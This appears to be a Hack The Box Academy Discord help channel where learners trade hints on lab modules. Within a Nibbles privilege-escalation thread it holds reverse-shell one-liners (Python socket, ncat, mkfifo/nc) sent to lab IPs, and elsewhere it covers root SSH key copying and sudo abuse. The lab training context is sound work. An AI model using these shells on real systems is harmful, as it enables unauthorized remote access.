hey, I just started it but can't really figure out how I might do it fast enough... since you were able to get a solution, could you give me a tip? Is it possible to beat just with the browser? <-<

Can someone help me for the questions in the module "Public exploits" from Getting Started ? Try to identify the services running on the server above, and then try to search to find public exploits to exploit them. Once you do, try to get the content of the '/flag.txt' file. (note: the web server may take a few seconds to start)

I don't know what to do I just know that FILEPATH is set to etc/passwd

And should it point there?

Oh

Hi! I'm stuck on the last section of the getting started module (Knowledge section). I got the user flag through metasploit and my thought was to utilize 'shell' to get a generic shell on the target but the shell does not respond when it launches(Like many others have talked about) I have not seen any hints to this problem in order to progress.

I'm still stuck lol

'/flag.txt' is the fiel you want this is the hint

assuming you picked the correct exploit in metasploit

I picked auxiliary(scanner/http/wp_simple_backup_file_read)

yes

now use it

ok...

you are overthinking it

just tell the exploit module you want the file

I will try

I don't know how to ToT, I can't use cat or things like that...

Why is it blank

Do I need to set TARGETUI ?

Yes

The exploit as is said in the name reads a file

So you can read the flag.txt file i.e

hi

is it possible to hack a discord server?

Not really the topic of this Discord server.

ah i see

Hey everyone, we are happy to announce that we have just released a new module called Broken Authentication. It focuses on one of the most common vulnerabilities in web applications and is an important part of OWASP Top 10. Check it out!

https://academy.hackthebox.eu/course/preview/broken-authentication

There is someone that can help me? I'm in module "web request", at the POST METHOD part: when I try to enter with admin:password, it don't work, and on the server answer I haven't PHPSESSID but auth="... Cookie..", what can I do to resolve??

*it doesn't...

@fleet moth simply add .1

Can someone, let me know the correct format of answering html injection question?

Hey guys, i've got a question to the 'Getting Started' Module which was often asked recently but I couldn't find an answer.
The task is the following one:
Access the SMB share folder called 'flag' and submit the contents of the flag.txt file.

When logging into the users folder, my access is always denied to do things. I think theres a hint in the task itself but the command 'smbclient \\ip\flag' isnt also working.

Can somebody give me a hint to solve my problem?

can i have a nudge on introduction to web application , page 8 : HTML injection
i think i have the right answer but maybe the format is not right. I have tested my payload on the server and seems to work fine

nvm sometimes the simplest option is the best 😉

@fossil onyx please share me the format, have answer. But not the format

@rustic sage try to use the credentials that is used in the module

In the getting started module, Im stuck on the escalate privileges section, can anyone DM me a hint on how to escalate?
I can get to user2... but then im stuck

I will message you directly in case you have some follow up questions 🙂

@rustic sage try to do as the module says about ssh key

I got, thank you.

@fossil onyx thank you

There is someone that can help me? I'm in module "web request", at the POST METHOD part: when I try to enter with admin:password, it don't work, and on the server answer I haven't PHPSESSID but auth="... Cookie..", what can I do to resolve??
*it doesn't...

Hi guys, please give me a hint. I stuck in last question:After obtaining a foothold on the target, escalate privileges to root and submit the contents of the root.txt flag. in GETTING STARTED module.

I still haven't found a way to get to root user yet

User www-data may run the following commands on gettingstarted:
(ALL : ALL) NOPASSWD: /usr/bin/php

I can help if you still need help. You can DM me

@unborn yarrow use https://gtfobins.github.io/ look at the php section

Can anyone give me a hint on how to get the service version for Nmap Hard-Lab? I already got open 3 port/services. I just need to get the version of the 3rd service.

Use cURL from your Pwnbox (not the target machine) to obtain the source code of the "https://www.inlanefreight.com" website and filter all unique paths of that domain. Submit the number of these paths as the answer?

Hello, everyone! I have finished the Getting Started module, but I'm wondering if there is another way to get a foothold at the last machine (Knowledge session). I got the foothold with the Metasploit module, but I would like to know how to do it manually.

i stuck at nmap hard lab too..

Hello, i am currently working on the Getting Started module, I am on the priv escalation portion and i am user2. i cant get the key to move into the ssh folder since i do not have access as user2. when i use the command in the cheat sheet to try it doesnt allow. can anyone help me with moving the key into the ssh file?

im not shure what i did to solve it but just try "cat
/root/.ssh/id_rsa" tell me if it works..

@strange aspen tried that and it pulls up the SSH key. so i can read it when i cat it

and where is the problem then?

you have to read the text... "If we can read the /root/.ssh/ directory and can read the id_rsa file, we can copy it to our machine and use the -i flag to log in with it:"

Hey good people I need help in the fundamentals
I did use the command:
Find / -type f -name *config -size + 25k -size -28k -newermt 2020-03-03 2>/dev/null
And it put
/usr/bin/apt-config
But that is not the answer

I also did visit the next page but I'd did not help me , do I still think inside the Miao BOX ? Feel like schrodinger's cat ^^

can anyone help me with the filtering contents section of the linux fundamentals module? i'm stuck on the last question:

"Use cURL from your Pwnbox (not the target machine) to obtain the source code of the "https://www.inlanefreight.com/" website and filter all unique paths of that domain. Submit the number of these paths as the answer. can you help me in this question"

@night inlet is that in the linux fundamentals?

yeah

@rustic sage i think i'm having a hard time on what i'm filtering

Wich section from the linux fundamentals? I also working since 2 hours to get the answer

@night inlet

Filtering Contents

@night inlet oh I still need 2 steps to start in this section, but you can help me in find files and directories

Hey, did you find your answer? I can help you with this one if you still need. DM me

Hey I'm doing Getting Started Privilege Escalation and I escalated to user2. I took the id_rsa from the target to my vm, but unfortunately when I try to login with it I get "invalid_format" and there's still a password requirement, I tried changing id_rsa to a .pem and then formatting it to pkcs8,but that won't work either. If someone could tell me how to properly format the id_rsa that would be greatly appreciated.

Hey ,thanks yes
I did not go to the target and ssh ....

@Rastislonge you have to Copy the beginning and the end of the idrsa File too..

Perfect if you get it ^^ wp

I need help with finding the path for the home directory for htb-students. I'm not sure what I'm doing wrong I clicked on target and it shows an Ip address....but what am I supposed to do next?...I tried typing ssh htb-student@10.129.23.92 in the search box and it said it didn't work. Where do I put the password and username at?...I'm completely lost...Any help will be much appreciated.

what do you mean exactly by "the search box"?

Yes a good feeling 👍

The Knowledge Check target machine in Getting Started is dead slow for some reason

Takes like 3 minutes to load a page

Hello everybody. I'm doing Getting Start Module and in page Web Enumeration I'm stucked... I tried all nmap and netcat flags, but I couldn't reach the target. So I tried by web browser and a I guess thw wordpress instalation page. At this point I stoped. I clicked on continue button and nothing changes. Please, someone can help me? Thanks in advance...

hello guys i'm new at HTB academy and i'm stuck in linux fondamentals modul in the first question in system information when i try to connect to the torget with SSH "target adress" i can't connect on it . help me please guys

make sure that you can ping the target, otherwise restart your instance or the target

ping ??

what do you mean by ping XD

you are getting an ip address something like 111.111.11[.]11

you can google what the command ping does 🙂

try ping [the target ip address] to check if your instance get replies from the target

Thanks everybody. I could get the flag. If someone need a help, please, DM me and I will help. #keephacking

okey thank for your help XD

The repository that has been told to clone in linux fandamentals
We have to clone it into the parrot os instance or we can install it into our current linux machine also?

@strange aspen thanks, I thought it was some small detail I missed

is your issue has been resolved yet?

Hello can i ask what does fingerptinting a device mean ?

Identifying specific characteristics about the device, such as the OS. You're enumerating the device to find out as much information about it as you can. This helps to develop a specific plan of attack. Hope that helps.

Thanks 😄

I am super new to Cyber and HTB so any help would be lovely. I'm really struggling to get the flag for the POST Method Module for Web Requests.

I've decoded the cookie, re-named guest_etc to admin_etc and re-encoded with Base64 but I'm struggling with the flag. I'm guessing it's to do with the JSON section to get it?
Its the answer to "Login with the credentials (guest:guest), and try to get to the admin user from what you learned in this section and the previous section."

Also the admin_381098731203 or whatever greeting is NOT the flag with or without the ! so I'm truly lost to what it may be

hooow do i hack?

++academy

hello guys, was trying to connect with the user "htb-student" in the linux fundamentals module, but it is not working.
I'm using (ssh htb-student @ targetIP).
What's wrong?

ssh <username>@<ip> there are no spaces
or
ssh -l <username> <ip>

ok ok

i will try that

I did it, thank you. I did the second way with ssh -l

++academy

Hello,
I need help at the Windows Fundamentals course. In Page 4 (Windows Processes and Services). I have to submit an non-Windows process. I know, that it should be an ||Adobe|| process, but it doesn't get shown, when I type ||Get-Service | select -First 5 |fl|| in the power shell.Can someone please help me 😄?

Sorry, my english isn't the best

🙂

i need help in fundamentls course web request, i don't understand how change the cookie.. can you help??

have you tried using burpsuite?

hi guys i need ur help, i stuck at Getting
Started-Nibbles Privilege Escalation. (Escalate privileges and submit the root.txt flag.)
i try with my webshell to append a reverse shell in the monitor.sh file
but it seems that every command that contains the ">" doesnt work and when i append a
python or ncat reverse shell from Payload all the things it just happens nothing..
im not sure how to continue now..

i even tried it with base64..

what command are you using to append?

what command are you using to append?

Message #modules

with python
echo "python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.15.220",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("/bin/bash")'" >> /home/nibbler/personal/stuff/monitor.sh

with netcat
echo "ncat 10.10.15.220 1234 -e /bin/bash" >> /home/nibbler/personal/stuff/monitor.sh

tried this? echo 'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.2 8443 >/tmp/f' | tee -a monitor.sh

That is from the tutorial

i think i already tried that because as i said it seems that every command that contains the ">" doesnt work.. but i can try again..

hmm.. wondering if it is a shell thing..

Please....

what to do here

why so many people wanting to reset the Archetype machine?

Hi guys, Im doing the Linux fundamentals module and the last question is really giving me a hard time. " What is the name of the network interface that MTU is set to 1500?" when I do ifconfig -a there are more than one network int. that has 1500 MTU.. eth0 eth1 tun0 etc. but non of them are correct what am I doing wrong? Thank you for your time and help !

@rustic sage I think you do ifconfig on your own « pownbox » and not on the target

you need to give the answer for the target

hello , I tried to install seclists on my parrot , and it says I need a kali-default package and i cannot install it ... what do I do?

Hello, does anyone know how to gain root access in the getting started knowlege check task? I enter the machine threw a php reverse shell that i upload on the admin website and log in as www-data. when i type sudo -l it says that i have NOPASSWD to php but cant do anything with that. Any help?

Have you tried 'man php'?

not really

il try it

i need to get linenum or linpeas on that machine somehow

why?

never tought that would help xD

ill try it now

ok 😉

ty for the tip

linenum or lipeas might be ok if you don't find anyting, but first rule out (or not) php 😛

What is the first rule? RTFM? :p

XD

Hey guys, I need help on one of the questions in the linux fundamentals module, the question is

what is the name of the config file that ha been created after 2020-03-03 and is smaller than 28k but larger than 25k?

In the terminal I had inserted

find / -iname ".conf" -size +25k -28k -newermt 2020-03-03

After that a file came up : /usr/share/drirc.d/00-mesa-defaults .conf

I put that as my answer but HTB is telling me its wrong so instead of ".conf" I just put "conf" and had tried every file that came up and they were all incorrect. I am stumped

try config

.config

No files came up

@sick rapids I have faced the same problem... I could get the flag executing the command step by step...
First selecting the file name and so on...
I don't know if this way is relevant, but worked...
Maybe I was typing something wrong...

Weird, I'll give it a try! Thanks, I'll let you know!

@pale nest did not work for me I get the same file and it still says its incorrect

@sick rapids I DM you

Yup got it

OMG .. I did not notice until you wrote it! Thank you. You saved me 😄 ❤️

There are other types of software besides the one you're thinking

Just download the git repo

Yes, I looked for other, where PDF is in the name but I couldn't find other yet... But thank you!

It may not have pdf in the name. Look for "update"

there's a command called findstr that works like grep

OK,i'll try that. Thank you!

found how thk you , otherwise me and my friend are stuck doing public exploits of getting started module , we tried a lot of exploits but can't find the good one :c , when you do a scan with msf does it download something to ur pc , if yes where it goes?

when you search msfconsole, i'm pretty sure it is already downloaded to your computer when you install

yes I know , I mean i did an auxiliary scan on the target , it was completed but I did not get anything :c

you can dm me for better pointers

same right now as well

oh man figured it out that was fun

hello community, im stuck at the module "getting started" privelege escalation 2nd section with the task to"gain access to 'user2', try to find a way to escalate your privileges to root, to get the flag in '/root/flag.txt'., i already copied the linpeas code into vim and started from the server but it either couldnt help, also i searched for serveral exploits but i cant execute many of them because the server dont have gcu, however i also tried to copy id_rsa, create a own folder via vim, change the permission to 600 and tried to connect via ssh to gain root access but nothing work

i hope somebody can give me a hint:)

you have to go the way with the id_rsa file...

having trouble with finding the path to htb-student's mail. I have looked at others with the same problem and got to cat/etc/passwd then I saw that the mails path was /var/mail but it did not work. Please help. Also why did others say to start with cat/etc/passwd I don't understand the logic behind it

thx, tried many variations guess ill stick to it a little longer, if someone can give me a clue pls dm

I don't get it... I looked for every Process with "update" in its Name, but I couldn't find anything, that was right..... I thought it was ||FoxitReaderUpdateService||, but that was wrong too....

it is foxitreaderupdateservice but u forget something..

I got it 😄

ok nice..

hi guys i have a question on the File Inclusion / Directory Traversal

it is on the last question of Local File Inclusion

you can dm me

Could you not tell me the ideas of solving the issue on this chat

well i don't know what your question is or what issue you're having, but it seems that most people are cautious about what they say to avoid giving spoilers

I do not like to get the answer straight away, I want to know the hurdles through the issue. I have tried searching on the internet but i got no results. So could you give me any possible hints

i can't help you if you don't tell me what you're having trouble with

i don't know what part you're on

In File Inclusion/ Directory Traversal module. on that the last question of Local File Inclusion(LFI)

yes, i understand that. but there are steps along the way. have you found anything yet?

Yes for the section on the previous modules i learnt a way of creating a directory on the terminal on finding the way to the answer, but so far in this i have tried about 5 methods(I am not sure if i can share that, so I just don't for now) and none of it worked.

Once again I would like the hints not the answer

Any Hints?

that's why i suggested you dm me, so you could share the actual methods you tried

i have no idea what you mean by 'creating a directory on the terminal on finding the way to the answer'

look at the cheatsheet for suggestions

someone else having issues with the vpn package?

can't connect to the vpn

What's the issue?

Europe server was not working. Changed to US and ready to go

thanks!

Hello,
I'm doing module "LINUX FUNDAMENTALS" and I have a problem with question 'What is the index number of the "sudoers" file in the "/etc" directory?'
I think I am good answer but system don't valid it
I don't want to write answer here, someone can MP to help me ?
Thanks

Ok my bad it's resolve, I forget to connect to ssh with correct user..

Can someone give me a push in the right direction? idk if i just cant see it our what. For windows fundamentals , what is the alias for ipconfig.exe. Ive tried get-command and get-alias and the options that are available for those commands, ive been stuck for too long on this.

i seem to recall get-alias working. are you using the powershell terminal?

Yeah, I RDP in the machine, open up a powershell window, and use the get-alias command. Closest thing that outputs the same info was get-netipconfiguration, bjt that isn't an alias.

get-alias works, i'm not sure what problem you're having. dm me a screenshot

sure one sec

just type Get-Alias without any option. Do you get any output at all? Is there an Error?

@rustic urchin someone helped me thank you. I guess I didn't put the answer in correctly uhg.

Hey guys, i've got a problem with the section 'privilege escalation' in the module 'getting start'. You can connect to the target via ssh with user1 and the task is to gain access for user2. Examining the answers already given here, i have to use the id_rsa file. My problem is, that both user1 and user2 dont have such a (path /home/userx/.ssh/id_rsa doesnt exists) and i cant view the id_rsa of the root because when i open this file via vim its just empty. I also tried to download it but i dont have any permission.

Can somebody give me a hint? you can also send me a dm

Is there a process that runs as root you can find?

Anyone around that can help me with the file traversal module? I'm having a tough time trying to get a foot hold. I can get the page to trigger an invalid input message...

I've got it solved with help, but thanks

No worries mate...

sure, you can dm me

Haicen you are a dude many thanks..

Hi guys, please help me. I'm stuck in Skills Assessment section, LINUX PRIVILEGE ESCALATION module during find flag4.txt? please give me a hint :((

can smbdy help me with nmap fundementals? currently stuck on this with hint..

"Use NSE and its scripts to find the flag that one of the services contain and submit it as the answer."

Hi I'm able to make a meterpreter shell in Getting Started /Nibbles - Privilege Escalation and I'm trying to "upgrade" it to a python shell, but it just won't respond to any commands I input. Anyone knows why?

also @tight glen do you mean "Network Enumeration with Nmap"? Because that would be for #774040372966981644

Was wondering if someone can dm me, I'm having trouble on the windows fundamentals module

Nvm

Figured it out

i don't remember having any issues like that, but you can dm me if you want to share the specifics

i am working on linux fundamentals and stuck with ssh login

can anyone help me with this

I see the issue straight up. I’ll let you figure this out 😉 @sand pendant

thanks pwning, i figured it just now

i was just typing ssh host_ip address

but the real deal is "ssh hostname@ip_address"

@sand pendant you got it 🙂

@novel matrix i was able to login but whats the hardware name
i even tried "lshw" but not able to figure it out

Go over what you just learnt

What is the name of the network interface that MTU is set to 1500?

what about this any idea?
this fundamentals is eating away my time
oh god

don't think too complicated

think about which command give you interface's information

you have a "cheat sheet" with list of usefull command for the module, this should help you

Getting Started - Services Scanning (2 questions)

Our target machine was originally: 10.10.10.40

But then suddenly they were scanning: 10.129.42.253 - for the SMB service

1 -------------- How did they come up with this IP?
(I don't see it listed anywhere or discovered that we have to use this one for SMB)

2 ------------- How did they come up with bob:Welcome1 credentials?
(again, maybe I'm blind, but I don't find from where they got the information about user being bob and Password being Welcome1)

Hello guys, please help me, I use the command systemctl list-units --type=service | grep apparmor : I see the unit name with description "Load AppArmor profiles" but when i submit the response, i get an error message Incorrect answer

@fallow mesa Please don't spam the same message in all academy channels.

it was not explained, it was just given to you

Thanks for your reply

Read the directions. If you are confused, do research and or ask a more specific question.

@rustic sage happy birthday

Getting Started - Public Exploits

Try to identify the services running on the server above, and then try to search to find public exploits to exploit them. Once you do, try to get the content of the '/flag.txt' file. (note: the web server may take a few seconds to start)

I was able to get this file:

/home/user137929/.msf4/loot/20210427161155_default_138.68.147.93_simplebackup.tra_901619.txt

After opening it with "cat" there was either nothing useful in it or I don't know how to open it properly. Someone can help?

hi

im new

Is there anything in the file? You can dm me if you want

Hello; I'm at last section of getting started module, however couldn't find my way out, could someone give me some tip?

at last exercise

hey! is there a problem with the machine from Module: Getting Started - Knowledge Check? It takes several minutes to load a single page, it's really impossible to work on it. Thanks!

hi , i am new to hacking

was having the same problem using any tools today... target systems not responding etc...

Happy Birthday @tough fjord !

Hi, I have a problem with the module getting started privilege escalation. I can't change from user1 to user2. Does anybody can give me a hind?

@ancient onyx try to use the steps that used in the example adjusting it to you scenario

One command gives you the information you need to get access to user2

#modules

Im new to hacking, what am i supposed to do

++academy

Going to be a stupid question I know, how the hell do I run JS Code? Is it through the console of the webpage?

Should mention this is the skills assesment for JS Deobfuscation

Scratch that got it. Console.log was what I was looking for

hi guys, can someone help me?im stuck at getting started module at very last question "escalating to root" to get root flag.

exactly stuck at the same spot

arrived until this point: echo "ssh-rsa AAAAB...SNIP...M= user@parrot" >> /root/.ssh/authorized_keys, but here I need the user2 password, which I somehow don't know how to get

just found on discord: upload linpeas to the target through ssh, so will try it, but no idea how to do it, will take for sure some time to figure it out

btw. you have not mentioned which lesson - I'm talking about Privilege Escalation

owh..no wonder u have 2nd user.. i thought i was missing something.. im at knowledge checking

the one with slow server

which lesson exactly?

tsame module as you. the last one,u need to scroll down abit until u see "knowledge check "

ohh, so you in front of me actually 🙂 I'm sorry, but in that case I can't really help, cause wasn't there yet. Having enough trouble with Privilege Escalation...lol

but if you know how to get a password of user2 in privilege escalation, it would be a great help 😄

i wont tell the answer but ill help you. check your dm

can you please give me a hind to. I have tried, but I can't get access to user2

for the web requests module how are you supposed to use burp if firefox doesnt have foxyproxy?

Hello, has anyone a hint for the 2nd question in the module "getting started " "knowledge check", i already let linenum.sh run, also i tried to upload a php file including a reverse shell, but i didnt had the right to create it, also i tried to put in a reverse shell code line in a php file that already existed on the server but that didnt worked also

Hey everyone, we have just released another new module called OSINT: Corporate Recon. This module contains a newly developed methodology that will help you not to be overwhelmed by the huge amount of information while you investigate all the components of your target company. Check it out!

https://academy.hackthebox.eu/course/preview/osint-corporate-recon

Hey I am having a issue with Linux Fundamentals... I am on question 3 asking “what is the path to the htb-student’s mail” I am typing /var/mail... what am I missing ?

Never mind I figured it out

Hi
windows fundamental
Which Windows NT version is installed on the workstation?
the answer format is "Windows X - 00.0.00000.0"?

some of academy's questions are very wide specially in formats of the answers

@ember heart it's of format Windows X

wdym?

Wdym ?? Means?

very new here - stuck at "interactive section with terminal". Could someone dm me for some help?

any idea about what is that WS01 in there?

ask ur q here
if someone wanna help he/she will

can somebody help me im stucked at "linux fundamentals"--> "system information" question3 it say: What is the path to the htb-student's mail? I tried: /var/spool/mail ; /var/mail but none of them worked

The answer is much simpler than you think. When I figured out what they were asking I 🤦‍♂️

guys im stuck at decoding can anyone help i got the "N2gxNV8xNV9hX3MzY3IzN19tMzU1NGcz" and also know to use base64 but its still not it and I cant think of any other method I didnt try already... am really lost

7h15_15_a_s3cr37_m3554g3 this is as far as I get I dont know what to do

I haven’t done this module and I might not understand what you need, but you could find « translation » for each letter

Like obviously 7 is t, 1 is i, 5 is s

Etc

You might be able to décrypte the string with this?

thats also what I thought this is what they want me to do | Using what you learned in this section, determine the type of encoding used in the string you got at previous exercise, and decode it. To get the flag, you can send a 'POST' request to 'serial.php', and set the data as "serial=YOUR_DECODED_OUTPUT".

Hello I'm having error when trying to escalate my privilege in Nibbles - Privilege escalation in Getting Started module. I have correct IP and port and yet I'm receiving this error: ** unable to resolve host Nibbles: Connection timed out **

edit: fixed

nvm im stupid i got it now

How do I get a gift card?

i remember that happening to me. i think it is like that intentionally? i think if you just wait it out it will eventually work

Hi! I'm absolutely new to HTB. I have 30 cubes. Where should I start? Also, if this Q is asked over and over again, please feel free to direct me to another post. Really appreciate the help!!

i was trying to brush up on my sql injection techniques and am doing the sql injection fundamentals. on module page 11, it says to connect to the mysql server, but it didn't provide the connection details. am i missing something?

on the other questions, it gave the password you were supposed to use

oh, nvm. it's the same creds from before

Yup, it workew on second try

Part of that would depend on your skill level and experience. If you're just starting out and don't have any experience definitely check out the intro to academy module and the learning process module.

Aside from those I'd recommend Linux Fundamentals, Windows fundamentals, and Introduction to networking. Not necessarily in that order but I'd say start off in Linux.

can someone help me with priv esc to root? burnt out lol

Which module?

getting started- priv esc

^

Did you unzip the file in home directory?

hi, i don't understand how to write path to my file. I'm using linux, and there is a path to file, but this bits trying to find file with windows path.

Identify one of the non-standard update services running on the host. Submit the full name of the service executable (not the DisplayName) as your answer.

can someone help me

anyone know this? from windows fundamenal

full name also have file extension)

thank you , i was so close but didnt know about the extension i got it now

@forest stream Dm I can help

join 2v2 Cyber Mayhem

working on the linux fundamentals got stuck on "Determine what user the ProFTPd server is running under. Submit the username as the answer." am only interested in guidance on how to get the answer. thanks in advance...

What port is your http server running on?

Im having the same issue.

ok @rustic sage I raised a ticket but still no answer ...status is "pending"

It looks like only the index and /admin/ directory load forever, rest of them are okay.

I see a message "Connecting to 172....." an address that's not in the IP range of the VPN, that was confusing and maybe the cause of the problem, but I really don't know

In the backend any click you make takes a lot of time, impossible to work on it

@wintry iron

this is how my index looks like

but when i bruteforced other directories, they worked perfectly fast

I beleive is the same for me. I was looking this 'Machine' a few days ago, and can't work anymore because of huge lag in that website. Logged in the backend Ok, did you do that already?

not yet, i havent found the password of admin user

Skills Assessment - Web Fuzzing - File Extension. I know there a 3, but my answer isnt correct, please dm for hint

Thanks, but i already solved it)
It was netcat on port 80

They have to be in alphabetical order separated by spaces

Hey - new to HTB and discord. Looking for help on the getting started module.

I'm on the public exploit (wordpress webpage using simple plugin backup) to find the flag.txt.

I've tried metasploit but can't seem to find the answer. I think it has to do with the filepath. Otherwise I tried search sploit and used the URLs provided in there.... I tried deleted the .htaccess and also doing a backup file download.

Can anyone suggest what I'm doing wrong?

It's a good idea to change the filepath in metasploit

@astral siren I tried everything 😭

Dm me your answer and I'll see what's up

I tried changing the file path from /etc/passwd (default) to wp-admin or the default apache file path for web servers but still nothing.

I think I'm in the right spot but I'm clearly missing the right filepath (I think lol)

Focus on that file you're searching for

I also tried /flags.txt but I havent tried just a /... Otherwise I'm not sure if there is a way to generically search for the file?

this is the right way, but check your file name

Hmm ok - I'll play around with it a little more. Thanks 👍

Got it. Thank you very much. It wasn't as complicated as I kept thinking it was 🙄

No Problem!

not sure if i'm doing the right thing

but the getting started section - service scanning is tripping me up due to the smbshare

gn guis

i'm stuck trying to find the config file in linux fundamentals

nm. found it

I'm stuck on privilege escalation -getting started , I need to get user2 to read a file , Can someone give me a little hint

Hello everyone!

I'm on Getting Start - Knowledge Check

it takes several minutes to load any page..did overcome so slowly speed?

Can you DM me how you did it cause I'm stuck 😩

How to I start this module>

@eternal flame what module?

Hi everyone, someone can give me a clue in module Getting Started/Privilege Escalation? I'm stuck in SSH key part. I don't understand what i need to do after vim id_rsa

How to find out the path to htb-student's mail?

idk just look around

maybe try to use some of the things they showed you to find files with like which

That's right, the path to the file is in theory, but the path to the email is not indicated anywhere

yeah youre right it doesnt seem like its there

fundamental module. I'm new to discord

That's it, I solved this problem

Hey everyone. I sure it's an easy step I'm missing, but I'm on the "Getting started" module and can't for the life of me change from user1 to user2. Any hints or tips or what I could do? Not looking for the answers but for some guidance towards the solution. Also I tried to get linpeas on the machine and not able to do so. Any suggestions on that?

nvm. Told you I missed something simple.

Simply try to find a way to see if there is anything that you can run as root

@elder pike thanks. Was able to find the issue. Missed one simple thing. But all fine now. finished the module :).

++

hi guys, im studying Web Request module and i have problem to resolve the Post challenge, i have de user guest:guest and de target, i have to manipulate the cookies to get admin user, i try but i can, someone can give me some clues please

i mean i can't get the admin user for the challenge, someone please help me with some clues

newbie question: i try to use netcad command line and when hit enter it doesnt show response only blank lines spawn

i can send ss if needed

You are on Academy, right? What are you trying to nc

banner of my targer 206.189.121.131:31681

Okay, but the IP is different from the screenshot

I know but I was trying to make it work

because it doesnt return anything

have you tried to use ssh rather nc?

no

give me a minute

I don't think user and password was given to me

Which module and section are you currently at

module: geting started section: basic tools

The target comes with a port, so maybe the SSH is not on the default port (22)

and can be on a XYZ

so the port is a user name?thats the command: ssh 31681@206.189.121.131?

Nope, try nc with the IP and the PORT

there is no need to log in via ssh

well it worked now and I thought I did everthing the same earlier. thanks 🙂

Hey guys. I may be misunderstanding something here.

Im at the "Linux Fundamentals" module, "Working with web services" section.

Do i need to ssh to te specified target system and try to start a http server over npm on it?

Or do i have to play pretend and just enter the command to start one in the answer field?

Hi guys, please help me. I'm stuck in the Attack Tuning section in the SQLMap Overview module. I have seen the flag in table flag5 but when I paste the result, it is not correct?

hi guys, im studying Web Request module and i have problem to resolve the Post challenge, i have de user guest:guest and de target, i have to manipulate the cookies to get admin user, i try but i can't, someone can give me some clues please

Base64

when i login with guest credencial i have a cookie, when i decode with base64 i got something like guest_7a2sabc7ss!, i change some like admin_7a2sabc7ss! and encode with base64, and try to get admin/dashboard, i get a new cookie i copy and put it to the answer but it doesnt work, what i did wrong???